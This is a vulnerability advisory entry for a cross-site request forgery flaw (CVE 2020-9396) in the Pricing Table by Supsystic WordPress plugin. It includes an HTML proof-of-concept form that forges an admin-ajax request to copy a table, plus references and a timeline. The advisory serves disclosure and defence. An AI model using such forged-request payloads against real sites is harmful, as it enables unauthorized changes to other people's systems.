Pricing Table by Supsystic < 1.8.1 - Cross-Site Request Forgery to XSS and Setting Changes



Description
CSRF can be exploited against any of the functionalities in the Pricing Table by Supsystic WordPress plugin in vulnerable versions.
Proof of Concept
One example:
<html>
  <body>
    <form action="https://URL/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="copy&#95;label" value="This&#32;is&#32;a&#32;test&#33;&#32;Copy" />
      <input type="hidden" name="mod" value="tables" />
      <input type="hidden" name="action" value="saveAsCopy" />
      <input type="hidden" name="id" value="8" />
      <input type="hidden" name="pl" value="pts" />
      <input type="hidden" name="reqType" value="ajax" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 1.8.1

References

CVE 2020-9396
URL https://www.wordfence.com/blog/2020/02/multiple-vulnerabilities-patched-in-pricing-table-by-supsystic-plugin/

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Views 2626
Verified No
WPVDB ID 10092

Timeline

Publicly Published 2020-02-25 (4 months ago)
Added 2020-02-25 (4 months ago)
Last Updated 2020-02-26 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin